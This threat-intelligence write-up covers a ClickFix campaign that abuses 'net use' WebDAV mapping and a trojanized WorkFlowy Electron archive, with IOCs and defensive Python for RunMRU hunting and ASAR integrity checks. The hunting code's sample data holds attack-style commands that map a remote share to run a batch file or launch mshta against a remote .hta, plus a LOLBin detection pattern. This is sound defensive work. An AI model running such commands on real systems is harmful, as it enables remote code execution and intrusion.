Atos researchers documented a ClickFix variant that ditches PowerShell and MSHTA in favor of ‘net use’ WebDAV drive mapping and a trojanized Electron application with a malicious ASAR archive — techniques that successfully evaded Microsoft Defender for Endpoint. The campaign was only surfaced through targeted threat hunting on RunMRU registry telemetry, not automated detection controls. A deployable Sigma rule exists for this TTP cluster, making immediate detection engineering action possible despite gaps in delivery mechanism and final payload visibility.
This ClickFix variant represents a deliberate architectural shift in evasion strategy. Rather than relying on interpreter-based execution chains that EDR tools actively monitor, the attackers open with ‘net use’ to mount a remote WebDAV share at 94.156.170[.]255 as a local drive letter, execute a hosted batch file through standard filesystem calls, then immediately unmap the drive. Because ‘net use’ is a native Windows networking utility and WebDAV traffic blends with HTTPS, this initial stage generates minimal telemetry compared to direct PowerShell or MSHTA invocation. PowerShell enters the chain only in a second stage — after the highest-scrutiny execution window has passed. This sequencing shows the threat actors understand EDR detection timing and have tuned their chain accordingly.
The second evasion layer exploits application trust at the Electron runtime level. The payload is a repackaged WorkFlowy desktop client (v1.4.1050, signed by FunRoutine Inc.) with its legitimate resources/app.asar replaced by a trojanized version (SHA256: a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063) containing a malicious main.js. Electron applications execute ASAR-bundled JavaScript in the Node.js main process, outside the Chromium sandbox, with full user-level privileges. Most endpoint security tools treat ASAR files as opaque application assets rather than executable code, creating a blind spot that this campaign exploits directly. The injected code runs as an immediately invoked function expression (IIFE) that blocks all legitimate WorkFlowy initialization, so a non-functional application is itself a behavioral indicator teams can act on.
The C2 infrastructure is lightweight and specific. The malicious main.js beacons to cloudflare[.]report (resolving to 144.31.165[.]173, AS215439, Frankfurt) via HTTP POST every two seconds, transmitting victim ID, machine name, and username. The domain was registered in January 2026 through OnlineNIC with a Hong Kong registrant. The only state carried across sessions is an 8-character alphanumeric victim ID written to %APPDATA%\id.txt; the dropper itself installs no OS-level persistence mechanism. The beacon runs only while the trojanized WorkFlowy process is running, with follow-on payload delivery presumably delegated to the C2. Because the C2 was unresponsive at analysis time, the final payload was not observed. This is a meaningful gap: any host that executed this chain before C2 shutdown cannot be assessed for secondary payload delivery without forensic review.
Detection coverage for this campaign is currently limited to threat hunting. Microsoft Defender for Endpoint produced no alerts on any part of the execution chain, confirmed by Atos. The only signal that surfaced the activity was suspicious command strings written to the Explorer RunMRU registry key (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) — the record of commands entered via the Win+R Run dialog. A Sigma rule (id: 20891a30-032e-4f15-a282-fa4a8b0d8aae) targeting this pattern is available and deployable directly against Sysmon Event ID 13 or equivalent EDR registry telemetry. This is currently the highest-confidence detection path for this TTP cluster.
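To show what hunting the RunMRU signal looks like in practice, here is an added example (not Atos's tooling and not the published Sigma rule) that runs a comparable pattern over constructed Sysmon Event ID 13 records. Field names follow Sysmon's RegistryEvent schema; the hosts, SIDs and paths in the samples are placeholders.

```python
"""Hunt Sysmon Event ID 13 (registry Value Set) for Win+R commands recorded under RunMRU."""
import re

RUNMRU_VALUE = re.compile(r"\\Explorer\\RunMRU\\[^\\]+$", re.IGNORECASE)
# net.exe / net1.exe "use" followed by a UNC target; WebDAV targets often carry @SSL or @<port>
NET_USE_REMOTE = re.compile(
    r"\bnet(?:1|\.exe)?\s+use\b.*?\\\\[\w.\-]+(?:@ssl|@\d+)?\\", re.IGNORECASE | re.DOTALL)
# Script hosts and other LOLBins that rarely belong in an end user's Run history
LOLBIN = re.compile(r"\b(mshta|powershell|pwsh|wscript|cscript|rundll32|certutil|curl)(\.exe)?\b",
                    re.IGNORECASE)

def runmru_command(details: str) -> str:
    """RunMRU stores each entry as '<command>\\1'; strip the suffix Explorer appends."""
    return details[:-2] if details.endswith("\\1") else details

def classify(command: str):
    if NET_USE_REMOTE.search(command):
        return "net use to remote share via Run dialog"
    if LOLBIN.search(command):
        return "LOLBin launched via Run dialog"
    return None

def hunt_runmru(events: list) -> list:
    """Return one finding per RunMRU value-set event whose command matches a pattern."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13 or not RUNMRU_VALUE.search(ev.get("TargetObject", "")):
            continue
        cmd = runmru_command(ev.get("Details", ""))
        reason = classify(cmd)
        if reason:
            findings.append({"host": ev.get("Computer"), "command": cmd, "reason": reason})
    return findings

# Constructed sample events; hosts, SIDs and paths are placeholders, not values from the report
RUNMRU_A = r"HKU\S-1-5-21-1-2-3-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a"
SAMPLE_EVENTS = [
    {"EventID": 13, "Computer": "WS01", "TargetObject": RUNMRU_A,
     "Details": r"net use Q: \\203.0.113.10@SSL\share & Q:\setup.bat & net use Q: /delete\1"},
    {"EventID": 13, "Computer": "WS01", "TargetObject": RUNMRU_A[:-1] + "b", "Details": r"notepad\1"},
    {"EventID": 13, "Computer": "WS02", "TargetObject": RUNMRU_A.replace("1001", "1002"),
     "Details": r"mshta https://203.0.113.10/page.hta\1"},
    {"EventID": 13, "Computer": "WS02", "Details": r"net use\1",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\Svc\ImagePath"},  # not RunMRU: ignored
]

if __name__ == "__main__":
    for finding in hunt_runmru(SAMPLE_EVENTS):
        print(finding)
```

Benign RunMRU entries that map internal file servers also match the net use pattern, so allowlist corporate share hosts before turning this into an alert.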
Two gaps limit the full picture. First, the initial delivery mechanism driving users to the phishing page at happyglamper[.]ro — which poses as a CAPTCHA — is undocumented. Whether the vector is malvertising, a phishing email, or a redirect chain is unknown, which constrains upstream prevention options. Second, the unresponsive C2 means full impact scope for any successful pre-shutdown infections cannot be determined from existing reporting. Teams should prioritize the Sigma rule deployment and ASAR integrity checks as immediate actions, while treating confirmed execution of any part of this chain as a full incident requiring forensic investigation rather than IOC-only remediation.
- Takeaway 1: Deploy Sigma rule id 20891a30-032e-4f15-a282-fa4a8b0d8aae against RunMRU registry telemetry (Sysmon Event ID 13) immediately — this was the only control that detected the campaign and targets ‘net.exe’ and LOLBin invocations via the Win+R Run dialog.
- Takeaway 2: Alert on or block ‘net use’ commands mapping drives to external HTTPS or WebDAV endpoints from non-administrative user contexts — this TTP bypassed PowerShell and MSHTA monitoring controls while leaving a distinct registry signal.
- Takeaway 3: Add ASAR archive integrity verification to endpoint security workflows — validate app.asar files against known-good hashes for installed Electron applications; the malicious archive SHA256 is a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063.
- Takeaway 4: Block or monitor outbound connections to cloudflare[.]report and 144.31.165[.]173; flag creation of %APPDATA%\id.txt by WorkFlowy.exe as a high-confidence behavioral IOC.
- Takeaway 5: Any confirmed execution of this chain before C2 shutdown must be treated as a full incident requiring forensic review — the absence of OS-level persistence in the dropper does not rule out secondary payload delivery via C2 contact.
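As an added illustration of the ASAR integrity check in Takeaway 3 (example code, not Atos's or WorkFlowy's), the following parses the public asar layout (8-byte size prefix, Pickle-encoded JSON index, then raw file bytes) so that a baseline hash comparison can be followed by extraction of the bundled main.js for review. The sample archives are constructed in memory, and the baseline hash is assumed to come from a clean install of the same version.

```python
import hashlib, json, struct

# Hash of the trojanized archive reported above
KNOWN_BAD_ASAR_SHA256 = {"a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063"}

def parse_asar(data: bytes):
    """Return (index, base): index is the JSON file tree, base is where file bytes start."""
    header_size = struct.unpack_from("<I", data, 4)[0]  # size of the Pickle header
    json_len = struct.unpack_from("<I", data, 12)[0]    # length of the JSON string in it
    return json.loads(data[16:16 + json_len]), 8 + header_size

def walk(node: dict, prefix: str = ""):
    # Yield (path, meta) for every file entry, descending into directories
    for name, meta in node["files"].items():
        if "files" in meta:
            yield from walk(meta, f"{prefix}{name}/")
        else:
            yield f"{prefix}{name}", meta

def read_entry(data: bytes, path: str) -> bytes:
    # Extract one file's bytes, e.g. main.js, for manual review
    index, base = parse_asar(data)
    for entry_path, meta in walk(index):
        if entry_path == path:
            start = base + int(meta["offset"])  # offsets are strings in the index
            return data[start:start + meta["size"]]
    raise KeyError(path)

def verify_asar(data: bytes, baseline_sha256: str) -> str:
    """'bad' = known malicious archive, 'ok' = matches the baseline, else 'drift'."""
    digest = hashlib.sha256(data).hexdigest()
    if digest in KNOWN_BAD_ASAR_SHA256:
        return "bad"
    return "ok" if digest == baseline_sha256 else "drift"

def build_asar(files: dict) -> bytes:
    """Build a minimal flat archive in the same layout; used only for constructed test data."""
    index, blobs = {}, b""
    for name, content in files.items():
        index[name] = {"size": len(content), "offset": str(len(blobs))}
        blobs += content
    js = json.dumps({"files": index}).encode()
    payload = struct.pack("<I", len(js)) + js + b"\0" * ((-len(js)) % 4)  # string pickle
    header = struct.pack("<I", len(payload)) + payload                    # size-prefixed
    return struct.pack("<II", 4, len(header)) + header + blobs

# Constructed sample: a clean build and the same app with its main.js replaced
CLEAN = build_asar({"package.json": b'{"main":"main.js"}', "main.js": b"require('./app');"})
TAMPERED = build_asar({"package.json": b'{"main":"main.js"}', "main.js": b"(function(){})();"})
BASELINE = hashlib.sha256(CLEAN).hexdigest()
```

In production the baseline is the hash of resources/app.asar from a clean install of the same version, and any drift is a reason to pull main.js out for review rather than just re-hashing.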